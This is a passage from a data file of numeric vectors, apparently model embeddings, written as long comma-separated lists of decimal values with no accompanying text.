327,0.022100318,-0.0039141513,0.0023102968,-0.016573543,0.021401875,0.0006555808,-0.006211915,-0.020432597,-0.0038126318,0.011612626,-0.013936663,-0.02366539,0.009736847,-0.018226255,0.0330181,-0.033489984,0.005729631,0.016798422,0.022326393,0.0069810473,-0.0036592183,0.01709023,-0.014898532,0.029503064,0.040432874,0.009277958,0.01850669,-0.020040534,0.00956386,-0.0016251095,0.0092370175,-0.024124572,0.027158251,0.0023857672,-0.0016795679,-0.019259412,0.00033221743,0.011089732,0.024510702,0.032329187,0.007907733,-0.015218308,-0.015021214,0.029459624,0.006043657,-0.0034048844,0.010524908,0.021998148,-0.001011417,0.03435558,0.024390029,-0.009886831,-0.01096834,0.0070486353,0.01118454,-0.0019236514,0.013615455,0.02956352,-0.0003831787,-0.018827274,0.015713774,-0.003646512,0.011479003,0.023456162,0.026930382,0.017942429,-0.0010628141,0.025142144,-0.017211255,0.0012876284,0.027389186,-0.0029449903,-0.011270758,-0.019368451,0.009501896,-0.009263454,-0.03164017,-0.009969596,0.01967214,0.00525313,0.0021156566,-0.008771919,0.019954374,-0.012999691,-0.0053649023,-0.014713344,-0.012710157,-0.037948474,-0.000505161,0.0013214075,-0.0046368116,-0.0054159993,0.009070568,-0.013091706,-0.0014060119,0.0020331817,0.010035061,-0.006764367,0.003608708,-0.019714583,-0.0024611407,0.007925104,0.06279962,0.0013793544,-0.018503357,0.009727109,-0.03818952,-0.02071337,-0.00072404783,-0.005482406,0.004011837,0.0011507747,0.0040321853,-0.0058411146,0.016396787,-0.008017527,0.0063663754],[0.010040598,-0.0011604816,-0.025564728,-0.023784649,0.016042054,-0.012920494,-0.012109384,0.0068517495,0.0023994173,-0.014139365,-0.0066989637,0.025534917,0.015279654,-0.011951922,-0.015702857,-0.011453717,-0.0057065287,0.0014956412,0.0012611551,-0.018189171,0.0021642302,-0.0042386805,0.020807823,-0.0025404305,-0.006575907,-0.011029633,-0.011472511,0.0065202485,0.014479878,0.0033813515,-0.0032348132,0.020050237,0.008391724,0.0022339777,0.020261701,0.009451129,-0.01933238,-0.01599604,0.011116096,0.0027347377,0.007995903,0.019605119,-0.02430906,0.030087717,-0.0052653034,0.0012027794,-0.0010620767,0.0015906998,-0.011250394,0.017769447,0.0026105256,0.018606376,-0.015731586,0.03316175,-0.002030388,0.008563505,-0.0060745035,-0.03075942,0.010377446,0.0024132656,-0.016287912,0.008039034,0.005830532,-0.021887079,0.01959817,0.00028986015,0.0012514306,-0.018750157,-0.012479075,-0.017339977,-0.003642394,-0.010115423,0.008828064,0.01629242,0.025849825,-0.0045907223,0.005133743,-0.020010514,0.0015829671,0.010585873,-0.026972461,-0.022621356,0.006746887,-0.023191912,0.014680089,0.01406649,-0.0020220955,0.0062515954,-0.010302594,-0.018695485,-0.010568858,0.005114135,0.008354295,0.0025139854,-0.0019393247,0.009883114,0.01726,-0.011254707,-0.014231619,0.019153196,-0.009324574,0.0033796004,-0.017941073,0.006428418,0.008494526,-0.0305505,-0.0063635698,-0.016636869,-0.009867791,-0.010695989,0.011840426,0.011079237,0.0006260183,0.0026336524,0.005457331,0.008225874,0.004230428,-0.009282138,0.0032230911,-0.0071501723,-0.0033336822,0.033097453,0.009793463,-0.0046649417,-0.0076188776,-0.0050537433,0.0051675937,0.02494743,0.0076556853,0.01587399,-0.0044919136,0.02524382,0.0020006339,-0.009677614,0.0018734125,-0.0022163254,0.0075645754,-0.018620683,-0.025747584,-0.0077858795,0.016987858,-0.020242289,0.015784152,0.012693209,0.023896443,-0.0007102125,-0.0041837604,0.0033698934,0.018564928,-0.013043628,0.008029758,-0.009824772,-0.0012643252,-0.021736575,0.0046292143,0.011550532,0.008394617,-0.008296727,-0.02115284,-0.010344781,-0.0013164408,-0.0068202177,0.01615289,-0.007860156,-0.02065119,-0.040338382,-0.0026682012,-0.007810849,-0.015794337,0.003771117,0.047992907,0.041311752,0.006159193,0.0151100345,0.0122986,0.008475358,-0.0010068115,-0.0046984525,-0.008692667,-0.013024664,0.026593667,0.0027309873,-0.008479331,-0.022144178,-0.0028419252,0.025754364,0.011494639,0.011850346,-0.009158691,-0.016630745,0.01595119,-0.022635074,0.00067271956,-0.0073916097,-0.02021853,-0.008349272,-0.006408939,0.07958816,-0.003083655,-0.009176801,-0.031943724,-0.005727816,0.01723096,-0.03230893,0.0066712154,0.011494484,0.0016408843,-0.015414847,0.02880113,0.012952177,0.029543433,-0.016901478,-0.010843151,0.0089494055,-0.008402318,-0.060736418,0.009658258,0.008435629,-0.009251592,0.01756625,-0.008818358,-0.00024979922,-0.0023171448,-0.036266256,0.002005135,-0.009008882,0.004813167,-0.00035691928,-0.001875386,-0.024652932,0.020812863,0.0056052255,-0.016628586,-0.027229818,0.014729954,-0.009992357,0.011610285,-0.010690766,0.0040616565,0.0041742963,-0.008399659,-0.0029970515,0.007924475,0.026815971,-0.019440718,0.0135827,0.00855467,0.0055731577,-0.011693452,0.04181204,0.009875405,-0.0057572303,-0.0027304695,0.026620084,-0.00595805,-0.018677657,0.016889315,-0.0066844723,-0.003171005,0.010282888,0.028136857,0.018422367,-0.017152714,0.037384797,0.02735174,0.0092242565,0.0070292433,-0.028826037,0.00050256826,-0.0021201267,-0.021289822,-0.010332936,0.020453762,0.0035142049,-0.00805395,-0.009681444,0.014256868,0.005949322,-0.0059648426,0.012455668,0.000994805,0.013877689,0.0014349269,-0.02392513,-0.011371955,0.012112533,0.006699834,0.00302021,0.027250761,-0.012492677,0.0062691346,0.01915537,0.022982666,0.0020550785,-0.02034393,-0.0062661176,-0.030787924,0.029102905,0.014739745,-0.021465847,0.015788678,0.00001998288,0.013597177,-0.013354848,-0.014382902,0.007390412,-0.0051804446,0.038369372,-0.015358327,0.0058471547,-0.03520719,-0.0046855966,-0.009877398,0.0026129026,0.008363471,0.030248148,-0.0066289436,-0.0031587651,-0.0052474025,-0.007245251,0.018512558,-0.013635639,-0.006383262,-0.025738455,0.0018454716,0.0073953276,0.0034743021,-0.008029628,0.027200112,0.0077666924,-0.0144378515,0.004808874,0.021671616,0.013222744,-0.018796112,0.0108845895,-0.018888237,0.016367886,0.016691716,0.016390273,-0.028094955,-0.020710852,-0.009605207,-0.008669023,-0.0023731668,-0.016357776,0.009671797,0.004331105,0.019133683,0.0057888813,0.02966208,-0.02746833,0.01363889,0.0057396125,-0.03815218,-0.014749602,-0.0037581746,-0.0038506442,-0.00085866975,-0.008336302,0.031130752,-0.036187317,-0.0035591433,-0.0045112176,0.095730275,0.012255728,-0.0030259395,0.011631982,-0.004190239,-0.0007174294,0.02018883,0.027378095,0.022440277,0.005678938,-0.002487477,-0.0014438219,0.0056305868,0.006152043,-0.016015662,0.0140822185,-0.023294736,-0.009563344,-0.02770652,-0.02051912,0.036521457,-0.002786389,0.019559233,0.0142488405,0.019657582,0.028513927,0.012034642,-0.008982455,0.0042809797,-0.03334029,0.004165115,-0.005680412,0.018995916,0.012181299,-0.023925284,0.010095672,0.017460704,-0.0078491885,-0.02153587,-0.0021624705,0.00854969,0.01863387,0.0070036226,-0.020668989,-0.0039344234,0.049544275,-0.0032237163,-0.010402472,-0.025054881,0.027563037,0.019767223,0.010144479,-0.0174946,0.028072944,-0.0080344435,0.020616483,0.01834621,-0.027047053,0.02843277,0.036999397,0.021019846,0.026655398,-0.011291715,-0.0050773653,-0.0023509413,0.016285822,-0.012938488,-0.0070875715,-0.0005259646,-0.0016790362,0.005203206,0.0044059544,-0.004823565,0.014206824,-0.0050544124,0.01866994,0.0072682076,-0.012342449,0.0040478725,0.016906941,-0.02092606,0.01210889,0.02101781,-0.004102246,-0.0049623684,0.0026578717,-0.0194381,-0.007196475,0.02733822,0.0017725468,-0.009068779,0.0010827554,0.02047349,0.01049498,0.028328268,0.027117305,0.010874838,0.026103342,-0.0042761536,0.022666603,-0.0072551966,0.0021680973,0.013478656,-0.00900841,-0.008293667,0.0062991437,-0.0074065556,-0.0066432497,0.004532655,0.0493175,-0.02997245,0.0078052026,0.002761022,-0.013319161,-0.0042750635,-0.015624058,-0.012436473,0.0006958159,-0.00077225204,0.0059242668,0.017392058,0.0015289856,0.024137901,-0.01086582,0.0077638933,-0.0070453864,-0.009351384,-0.008659047,0.0009120554,0.009055193,0.0057907538,0.029973239,0.009071965,-0.0319541,0.03230729,0.0041995016,-0.015000011,-0.036098555,0.03198616,0.0076688384,0.010211562,0.034089595,0.021457631,0.015390624,0.003480145,0.0410083,0.04580096,-0.00096838747,-0.023209052,-0.021093888,-0.014348415,0.0025541426,0.026759129,0.0030079028,-0.004338267,-0.002263834,0.021708058,-0.01927996,0.011247106,0.0053364797,0.032651678,-0.03191404,0.0044955816,0.0051868265,-0.0047143255,0.01794247,-0.0011277323,0.0614376,0.0068867407,-0.020964384,0.018480798,0.0051999004,-0.00013878806,-0.030060977,0.021513384,-0.020709353,0.0021228178,-0.0039590765,0.038570575,-0.0099954195,0.02124286,-0.015773121,-0.0042410926,-0.00040251945,0.019620994,-0.006291473,0.0039037191,0.0026363411,-0.016566858,-0.010196848,-0.021218738,0.004090785,0.029187616,0.0035388486,0.009477964,-0.014868234,-0.009664973,-0.01948856,0.0002863506,0.02101492,-0.0027590336,0.010887498,0.0075637586,0.020717036,-0.014136306,-0.0068005784,0.030716524,-0.007731901,0.0017972881,0.012265885,0.016427645,0.027064856,0.0110166455,-0.0076822666,0.018740166,0.035914447,-0.0049703903,-0.0037477175,0.02684747,0.009812195,0.0023021253,-0.0018048581,0.010991873,0.01563768,0.004853232,-0.015767293,0.013966109,0.017953673,-0.0101456335,-0.0060136574,-0.017102571,-0.019037658,-0.0022810935,0.0055096997,-0.0064577297,-0.006328514,-0.024054969,-0.010882728,0.011263476,-0.00018783056,-0.006259496,0.031450443,-0.000610203,-0.0122286035,0.01746771,-0.0025688875,-0.013257978,0.009672456,0.009684795,-0.00480464,0.0052684797,0.022885745,0.013960351,0.0053449986,0.0017258205,0.009326735,-0.022776343,0.0023399987,-0.021870222,0.02724777,0.009079919,0.014165481,-0.0040776404,0.022238888,-0.009827588,-0.012227127,-0.0036657264,-0.02859977,-0.0065040984,0.0023262496,0.03193897,-0.005562084,0.0004087488,0.003786339,-0.010774448,0.013104717,-0.011989734,-0.0057660853,-0.0303696,-0.004070264,0.021369208,-0.0043085897,-0.019716172,0.03804213,-0.0053021675,0.00093415787,0.0059244772,-0.010597114,0.0044320086,-0.0011744153,-0.022422923,0.013497792,-0.002051431,-0.0068777455,-0.04255121,-0.025765918,-0.025000215,-0.04265537,-0.016017098,0.045037147,0.00024339095,0.00831205,-0.0034801685,-0.005265183,-0.008676972,-0.013375382,0.01571662,-0.041849416,0.0070791496,0.01330457,-0.012223228,0.0062504313,0.018964823,-0.0015307782,-0.0018675834,-0.027696975,0.010921833,0.008926228,0.014459703,-0.028319392,0.0048002885,0.008367254,-0.0005401565,0.02488269,-0.022613453,-0.00052611344,-0.0029597958,0.018772582,-0.018120566,0.011034049,0.008488051,0.01841027,-0.019714603,0.0102764405,0.017386919,0.031182315,0.00078262895,0.012445441,0.006160949,-0.009005195,0.010224217,-0.011574458,0.011096525,0.017819636,0.027168944,0.011959941,0.0076246145,-0.013298553,0.018485576,0.002401869,-0.008076163,0.0000354186,0.024427073,0.009366286,0.0059731193,0.025800804,0.0030424336,0.021141706,-0.01233275,-0.031274643,-0.03428774,0.018575065,0.030080995,-0.015799634,-0.0014626794,-0.0017793695,0.004306836,-0.014262683,-0.017780783,-0.021209463,-0.020602128,-0.011761055,0.022149267,-0.014245917,0.0051875007,-0.044114333,0.016230615,0.015959268,0.025505899,0.009096309,-0.0026058618,-0.015874606,0.032127686,-0.0021880192,-0.014784618,-0.041597184,-0.00015457354,0.03229465,-0.026779005,-0.01012589,0.003664794,0.007177696,0.0071514756,0.012684976,-0.03619808,-0.033305194,0.0076209726,0.0019098979,0.013241198,0.026663737,0.018204452,-0.012207799,0.0062909396,-0.00089861936,-0.018662374,-0.0044808346,0.005327788,0.002001702,0.0058928845,0.005883006,0.00014013458,0.004774235,-0.031194175,-0.0069843982,-0.00011453446,-0.037694823,-0.032103956,-0.019539883,0.01798958,0.0020108426,0.022615606,-0.0178034,0.03284029,0.022081785,-0.004255296,0.02053103,-0.011145638,0.020316483,0.0140397865,0.042661544,-0.0132570835,-0.031813875,-0.023445856,0.035674363,-0.014936829,0.010095246,0.014591466,-0.027894452,-0.02197531,-0.025759181,0.009996221,-0.018208137,0.0015782096,0.0013687132,-0.028791647,0.029354433,-0.019116841,0.011101692,0.023119822,-0.009803371,0.00023319312,-0.015886558,0.024351526,-0.029075198,-0.00599239,-0.0077463887,-0.019555094,0.012563135,0.011880938,-0.024595687,-0.02593739,-0.03185671,-0.0036882197,-0.014360383,0.009969621,0.0173665,-0.007871172,-0.03399328,0.016507426,0.015434187,0.020504259,-0.016523872,-0.023561312,0.003945767,-0.0059693223,0.011759067,0.009270318,-0.015980417,0.011148751,-0.015586348,-0.005297161,0.01619936,0.022907117,0.00642491,-0.0037756439,-0.010266137,-0.01717346,-0.015134713,0.026850894,-0.0028143988,0.0016178465,0.04141258,-0.0011960991,-0.0007591694,0.0028972712,-0.024305655,-0.009205218,-0.015128157,0.0046681734,-0.018752264,0.010379816,-0.0042390777,-0.01179928,0.0068789483,-0.0022060818,0.025322404,0.020938566,-0.0071734022,0.022918355,-0.011595529,-0.024406128,-0.003006723,-0.010434077,0.0026523012,0.0019483971,0.0010799412,0.013382757,0.024572454,0.035738833,0.0057745245,0.020757858,0.014815553,-0.0004641508,0.008619495,-0.0029575645,-0.00020293037,-0.009774331,-0.011145126,0.018576786,-0.02136471,-0.008590341,-0.006982208,0.0075904275,0.019605724,-0.009630534,0.0059832716,-0.014121565,-0.004787386,0.018870559,-0.01723291,0.023251565,-0.010374133,0.016191194,-0.011759528,-0.01487892,0.011876256,0.018156055,-0.0029570363,-0.008127799,0.000731246,-0.010025343,0.014476318,-0.0051994096,0.011493855,-0.0013567611,0.005285188,-0.006669072,0.009812161,-0.011956326,0.023811981,0.024991088,0.0009043558,-0.004411974,-0.026877902,-0.02978021,0.013891612,-0.011178412,0.0037234104,-0.012544091,-0.001872083,0.008154284,-0.021645043,-0.011462695,-0.016477274,-0.07181361,0.023408515,-0.011945746,0.0021152166,-0.010540213,-0.012310229,0.021737756,0.00012911078,0.031864848,-0.012851899,0.016665054,0.023174142,0.007205175,0.013995139,0.011963951,-0.015355212,-0.027422018,0.00049892184,0.018873442,0.010939673,-0.0007888616,-0.0014134127,0.015944656,-0.00007354709,0.03313982,0.0033622393,-0.022578819,-0.003349128,-0.03174083,0.00041117662,-0.008590572,0.019827982,0.0032585252,-0.013305799,-0.008718532,-0.011325895,-0.008536782,0.025474707,-0.013665414,-0.009842991,-0.013654675,-0.01668112,-0.007376981,0.030584952,-0.024430599,-0.028840123,-0.004929016,-0.013528381,0.0016440796,-0.014753836,0.04160012,0.004806805,-0.0034961642,0.028708091,0.018643798,0.02026876,-0.005535767,0.014490093,0.0036587052,-0.008641932,0.006513408,-0.00009957317,0.021260273,0.029769748,-0.03081336,-0.01728873,-0.0137607725,0.020183261,-0.0005103878,-0.016745003,-0.019023454,-0.019460466,-0.019881142,-0.0027613842,-0.019948715,0.020034146,-0.017821118,-0.023504335,-0.0054221316,-0.011267781,-0.01306445,0.012777135,-0.019118587,-0.017311683,-0.018468853,-0.019308146,0.007821304,-0.0043726377,-0.0025440387,-0.017936945,-0.014389076,0.007961337,-0.02346105,0.017251527,0.019117046,0.03590128,-0.0038133718,0.008551112,-0.007950671,-0.008057366,0.017667841,-0.0135469325,0.0021071867,0.057656676,-0.0051313783,0.00067580264,0.012333261,0.0241776,0.008437802,0.012897762,0.0076814448,0.024513163,0.0034285735,0.004714519,0.025163285,0.016848356,-0.020962566,0.009677501,0.0309998,0.020231524,-0.0018968568,0.011986009,0.019457128,0.011831767,-0.0002460518,0.016303677,0.016946457,-0.009177418,-0.014996962,0.005258489,-0.014557507,0.026045015,0.020606395,-0.0059271203,0.014787856,0.0025433395,0.019863851,-0.017602725,-0.0071704383,0.003001196,-0.0055862973,0.006232533,0.0020171423,0.025161188,-0.013273268,-0.011327409,-0.006159875,0.03496963,0.0056374823,0.009476002,-0.00011998164,0.004026636,-0.0026973863,-0.008380722,-0.019734105,0.015015577,-0.0035342674,-0.010374523,-0.0059495084,0.017676884,0.011911249,-0.016170606,-0.0049514584,0.0032375392,-0.021885881,-0.0058685504,-0.014130901,-0.013947375,-0.0077596894,-0.008490132,-0.003571297,0.03631287,0.0047258716,0.015935628,0.00024718556,-0.018135829,0.018222671,0.011608944,-0.0023178358,0.0016000279,0.0031770377,0.03226044,0.018157966,-0.028496783,-0.0012274715,-0.0044960333,0.0066441647,-0.000044233653,-0.017445039,-0.027666802,0.01260385,-0.0024783993,0.016577162,0.0019270307,-0.01965514,0.02951722,-0.0005980373,0.0385922,-0.009900629,-0.0063843722,0.010664515,0.028522713,0.008815954,0.014422473,-0.025511079,0.016426127,-0.005299125,-0.04882681,-0.012694882,0.007796784,-0.008338611,-0.006470262,-0.0099113975,-0.034906227,-0.011636258,0.0049322513,-0.014496252,-0.0033295632,0.010570295,-0.019572057,0.009781134,0.031059261,-0.0022119014,-0.00394681,-0.020870665,-0.031782907,0.03282785,0.02750366,0.0020334437,-0.015579047,0.017085241,-0.020021997,0.03538282,0.0397473,-0.020524815,0.014413002,0.004946928,-0.004532686,-0.024587661,-0.017493086,-0.005998337,0.01982083,0.012148763,-0.014784431,-0.008372149,0.027071923,0.0032768103,0.008643303,0.00018734472,0.02814957,-0.016311452,0.0042266347,0.000546222,0.0055672177,-0.02785962,-0.0035357277,-0.04331878,-0.027052904,0.008743135,-0.010624426,-0.01567764,-0.004720805,-0.019875387,-0.0055745062,-0.021031408,0.011502562,-0.013082898,0.016736409,0.018541096,0.013289003,0.0017969855,-0.0005093689,0.0045399135,0.0038246932,-0.011587569,0.00050801056,0.0063364664,-0.00018461759,0.011722684,0.016134255,0.013049173,-0.0047478434,-0.0076923156,-0.046578016,0.0062919473,0.018642185,0.004987467,0.0006125347,0.016961802,-0.004424482,-0.00783847,-0.018991873,0.00071553944,0.014506227,0.005385039,-0.016475754,-0.0020201553,-0.014460807,0.0071747666,-0.026723402,0.07600319,-0.013466091,0.0038078798,-0.015751153,0.017658576,-0.025234975,0.014868144,0.0072202277,-0.0013123328,-0.016972803,-0.028845904,-0.0056210863,-0.01057195,-0.022875471,0.027931271,-0.007735797,-0.0003500144,0.0108484,-0.01359855,-0.00093719544,0.0003697009,-0.0012816513,-0.007874202,0.0023830982,-0.015503756,0.01397205,0.013786879,-0.0174175,0.024332063,-0.019052062,-0.00082517264,-0.020985434,0.01232362,0.004515257,-0.0040178606,0.0067712013,0.0066554844,-0.0105425585,-0.008131244,-0.0062671844,0.008760825,-0.016942332,0.032780237,-0.0075078197,0.023740657,-0.004219912,-0.018737193,-0.005225947,0.005737599,-0.011217017,0.012057016,0.0031280185,-0.014972275,0.015128489,-0.024225987,0.02097914,0.005539233,0.01682067,0.0029954095,-0.016643398,0.0031655268,0.022184625,-0.0063040433,-0.0023051316,-0.0017601098,0.000892437,-0.010729578,-0.026637526,0.007966585,-0.027034435,0.008041075,-0.016595459,0.023224005,0.028595297,-0.0014002365,-0.0024126933,0.01800981,-0.0028520033,-0.009671414,0.008209845,-0.006489376,-0.014417991,0.032225024,0.009056764,-0.024816858,0.022261772,0.017720513,-0.003331288,0.06973078,0.01348314,0.020886805,-0.01154324,0.0007744487,0.023112599,0.009509745,0.024346473,-0.009613754,0.011765131,-0.0041086143,0.01373396,-0.0012698416,-0.0006655887,0.017534506,0.008150588,0.00674342,-0.0067698034,0.0051875757,-0.015052355,-0.0019269817,0.016612463,0.027105242,0.0058459244,-0.0058339783,0.0047992016,-0.01727487,0.0013274783,0.0077349744,-0.020876575,-0.004351628,0.014707256,0.022802765,-0.0017675096,-0.000011752437,-0.034496665,0.015058952,0.13232099,-0.0054376544,-0.017961625,0.04262661,0.008648603,0.018139947,-0.11635444,0.009538623,-0.012074541,0.0011026214,-0.000037867427,-0.0074645225,-0.019548273,0.030982547,0.005979003,0.0039361194,-0.010900421,-0.029451717,0.015809717,-0.013627989,-0.010773067,0.005851107,-0.011279883,-0.005704363,-0.035577517,-0.012990703,-0.0062297457,-0.009356553,-0.023813775,-0.005774972,0.0017965263,0.00012010662,0.00934584,0.0015520746,-0.002448114,0.014692274,0.002430232,0.010998263,-0.008755695,-0.01832991,0.01802119,0.0047133015,-0.011996461,-0.04633647,-0.15425271,0.0075192563,0.0007021372,-0.03459961,0.02053314,-0.0076920656,0.005975459,-0.013283123,0.009822066,-0.006012148,0.0001702512,0.02394772,-0.0016390397,0.015758112,-0.008204012,-0.014537326,0.004230451,-0.005507323,0.009344143,-0.025564702,0.0019168303,0.002626833,-0.0023347312,-0.029981544,-0.020985488,-0.0019272853,0.022644905,0.025780585,-0.00450531,-0.004931984,0.0022592999,0.00800119,-0.030266972,0.0072106114,-0.00473498,-0.02142942,-0.0188468,0.024415912,-0.02154944,0.04243917,-0.019777011,-0.0048043747,-0.0037906617,0.0016051513,0.006447625,0.038222324,0.010712441,-0.00024092298,0.0023229348,-0.0067088385,0.009141519,-0.008984829,-0.027151931,0.008584579,-0.00962184,0.0029705528,-0.011828223,-0.030720528,-0.018673662,0.0075570247,-0.019545777,-0.023826696,-0.008620042,-0.00895653,0.030463617,0.006370601,0.02371418,-0.02997035,-0.008021007,0.012964721,-0.013691811,-0.003277943,0.00091688446,-0.021388303,0.027368098,0.022031445,-0.0059675626,0.0041276426,0.01770996,-0.01146645,0.0077704047,-0.014532771,-0.006008247,-0.020994253,0.00021172516,-0.0073845275,0.0036840646,0.008366083,-0.016399574,-0.00023454968,0.0015688711,-0.028130814,0.01424371,0.012569212,0.017834084,-0.0029151652,0.033802383,-0.0030192633,-0.033483256,0.013428235,0.008760659,-0.018289326,-0.013989335,0.009002224,0.00044885316,0.008089583,-0.001217454,-0.020632485,-0.032357294,-0.010329331,-0.014492859,-0.032188784,0.02066514,0.0009329302,-0.024140017,-0.032836467,-0.0054364973,0.0057028756,0.015989205,0.007456819,-0.02444275,0.004212356,-0.011767976,0.0050959843,0.031841595,0.025851745,-0.029614367,-0.01788219,-0.0031574871,0.020711731,-0.020294387,0.0027756526,-0.010568596,0.009403651,-0.027072705,0.000012990648,-0.01918172,-0.006044564,-0.02929969,-0.0009489214,-0.0023170093,0.0115548065,-0.004805228,-0.009361344,0.008778118,-0.028181039,0.023867639,-0.009513127,0.028806362,0.005789785,0.023169622,0.022949122,-0.017869022,-0.012605674,0.015194047,0.06129584,-0.010306944,-0.004896805,0.026298333,0.0066440855,0.00043170757,0.015092964,-0.008313737,0.0024456878,-0.003692852,-0.010745562,0.0050262846,-0.021722427,0.008800458,-0.023739403,0.018981757,0.01628082,0.017311202,0.003187124,0.015451757,0.027579544,-0.017095536,-0.0046404786,0.007929819,0.02411661,0.0043758405,0.01279161,0.010771265,0.0054048277,0.0115152495,0.0022159638,-0.007420088,-0.0077229785,0.00908102,0.0027987084,-0.024337295,0.0055908835,-0.012945439,0.00261509,-0.023813939,-0.00765226,0.031614125,0.014542591,-0.007179696,0.0076751187,-0.009234342,-0.0071172747,-0.00654814,0.0093621565,-0.01198372,0.009706587,0.008881945,0.0067262296,-0.020640953,-0.012469042,0.012660335,-0.025500942,-0.00085030345,-0.016932314,-0.018728685,0.022669522,-0.018625142,-0.029075935,-0.0041527613,-0.011767048,0.0076580946,-0.0073703495,0.005072571,0.0017839589,0.006956712,-0.019549463,0.002716762,-0.020176936,-0.00402263,-0.01188521,-0.008684844,0.0045771785,-0.0070209936,-0.010901161,0.020076608,0.0052402946,-0.0043503274,-0.0010868908,0.00024616352,-0.0012637225,-0.029843872,-0.018466357,0.023719136,-0.011195512,-0.0017478687,0.014310679,0.01329181,0.025799833,-0.003700116,0.0227398,0.013930813,0.028204387,0.013616185,0.02677184,0.001756279,0.024969863,0.01200898,0.016035818,-0.027871344,0.009625547,-0.027699804,-0.012191901,0.010694983,0.017697359,-0.032591037,0.006769506,-0.02317523,0.01223366,-0.04458667,-0.0073295664,0.021477083,-0.0011252791,0.016095791,0.009283595,0.0028192564,0.0016481414,0.012260882,-0.0053901845,0.018572416,0.023247693,-0.0321337,-0.002305985,0.012070352,-0.011634533,0.020624883,0.005702879,0.02607018,0.007880782,0.001549422,-0.009868589,-0.007483356,0.006268473,0.015212642,-0.008625948,0.008370921,-0.028788956,-0.02523131,-0.0030219906,-0.008424123,-0.006065282,0.0036831237,0.010684003,0.011572732,-0.015428994,-0.004008836,-0.014507796,0.01602953,0.0020557393,0.01095275,-0.000585906,-0.004003889,-0.03439153,-0.0024516156,-0.0009965291,-0.016572855,0.007265,0.04624418,0.001958304,-0.015468483,0.0009853744,0.0081146015,0.023794146,-0.009598885,0.03269981,0.0013038282,-0.005167368,-0.013859807,0.019316291,0.0031562361,-0.0022039542,-0.016148865,0.022533454,0.034399327,-0.0154460585,-0.016694404,0.010091682,-0.0022244637,0.0025906845,0.001362622,0.0011284538,0.013580215,0.007828161,0.020048643,-0.0065823277,0.0024171497,-0.015849411,-0.014377913,0.018385155,0.0028232648,-0.008582977,0.005470799,0.008715349,-0.014614515,0.004110264,0.019158402,0.0066532027,0.024104998,-0.0065419287,-0.018140208,0.00078771595,-0.0137399705,0.008016349,-0.0045318054,0.00016796046,0.0005774816,0.0043852725,0.0019530073,-0.0070694876,-0.0009642092,-0.011052445,-0.00299134,-0.017288612,0.023464954,0.004928434,-0.037651904,0.025324212,-0.010720288,0.016293,0.003712605,0.006852838,0.0030381638,-0.01935403,0.061228912,-0.019471252,-0.020887665,-0.006674257,0.03382527,0.005449296,0.001430459,-0.011271992,-0.023594525,-0.012423498,-0.010316215,-0.051164906,0.005148362,0.014623016,-0.023287287,-0.024086827,0.0008491143,0.002198781,0.013392215,-0.002668816,0.004049069,-0.00414706,0.031782158,-0.0047338577,-0.0046514585,-0.051402975,-0.010556021,0.0013864613,-0.02652411,0.006801844,0.010625004,-0.0035059801,-0.016382826,0.0031914467,-0.026591578,-0.002475285,-0.0070733805,0.014260109,0.026785912,0.0067826784,0.0270099,0.0031786028,0.0022162574,0.010946146,-0.001672896,-0.006055986,0.0066082734,0.021417443,-0.023613064,0.031112805,0.0019223533,0.013158788,0.04104544,0.010322722,-0.0212957,0.018125938,0.007197762,-0.009000013,-0.0008765185,-0.012064687,0.01883349,0.0113844,-0.02183792,-0.00437981,0.027753089,0.016324114,-0.006074174,-0.012731693,-0.011918079,-0.0021177412,-0.017594403,0.020116137,0.0055778874,0.014609653,0.016786097,-0.014912582,0.011628115,-0.013584744,0.018276991,0.03394997,-0.006620428,0.0053197495,-0.007221018,-0.015539053,0.0047898125,0.01515504,0.0071144863,0.016480533,-0.004075878,0.03522458,0.032724693,-0.01857176,0.006372548,0.0008449764,-0.0114282705,0.0057485797,-0.005610552,-0.012098959,0.022414729,-0.005807231,0.004620013,-0.009406364,-0.00453734,0.005780605,-0.017150491,0.015457229,-0.08815679,0.025436006,-0.021520093,-0.015139726,-0.005294594,-0.009658948,-0.011412888,0.026778677,0.0085401675,-0.029524367,-0.02041071,0.008250959,0.013286159,-0.0039522047,0.006203637,-0.007773375,-0.025676217,-0.00586843,0.0013870576,0.025095925,0.021371428,-0.014084872,0.0052952985,-0.0074505075,0.0036400887,0.004796221,0.003926281,0.0060696267,-0.0030457135,0.01298078,0.0011213842,0.0051140566,0.00075445056,0.017282197,-0.0041652597,-0.0021359904,-0.0017015463,0.0014256875,0.015476575,0.010100619,0.0067275823,0.007815808,0.00074484176,-0.0028601515,0.012681099,0.0009787632,0.0047232294,0.018181697,0.007997656,0.031675015,-0.0093052015,-0.0037164,0.011854522,-0.026877994,0.004180993,-0.019547082,0.0033448967,-0.018313149,0.006127705,0.01451289,-0.02113945,-0.014443749,-0.0051026205,-0.012350201,-0.0014251581,-0.01062311,-0.0037147277,0.0013891631,-0.033356715,0.011011371,-0.01528655,0.009869571,0.008515753,-0.008803429,0.0093475925,0.015449586,0.0077765924,-0.007036269,-0.00538637,0.020342384,-0.029151447,-0.0012706312,-0.0032633971,0.043760628,-0.0000026871028,-0.018266587,0.015199935,0.014341796,-0.008209655,0.0037855776,0.012524534,-0.004857978,-0.020059437,0.008341688,-0.022183748,-0.0037385074,0.008922699,0.0064884825,-0.015277271,0.0068734167,0.014381006,0.008487573,0.011222323,-0.017886046,-0.08809709,-0.006554583,0.036056228,-0.008217459,-0.016688086,-0.0036900723,0.027380625,-0.015729306,0.025630966,0.0061535416,0.008017438,0.010088114,-0.021544194,-0.0063239327,0.0051427926,0.018928016,-0.035708923,-0.0030731503,0.0029421067,-0.010773431,-0.008512422,-0.005122081,0.0023242314,0.0103283,0.0039204154,0.0016875537,-0.010887286,0.031800415,0.021091726,-0.0075754514,0.00060971384,0.010882478,-0.01654084,0.007996624,-0.0436342,-0.007075431,0.018369915,-0.017024897,0.011021223,-0.0026826898,-0.004484307,0.017685713,-0.0064620934,0.0121303005,-0.0053722635,0.009360417,-0.019393241,0.015834074,-0.021243226,0.0073017096,0.0033125577,0.004963196,-0.01475424,-0.010070837,0.011220848,-0.002232166,0.021165626,0.025984813,-0.008730519,-0.00386765,-0.011552035,0.0047672,-0.009397417,0.008353432,-0.0025009585,0.012444589,0.005242607,0.016072717,0.006814452,0.0018621001,-0.0013077591,0.01368332,0.006337803,-0.0016195911,0.026127182,0.005286562,0.005127485,0.028750548,0.010433144,-0.0063836197,-0.004719468,-0.029516902,-0.00806758,0.00086105574,-0.026906135,0.016913798,-0.0035566338,-0.0043358686,-0.021434285,0.019355677,0.020619959,0.026862806,-0.016495882,0.033254623,0.0055258977,0.023994492,0.027528457,0.003412421,-0.02350724,-0.0065375166,-0.01849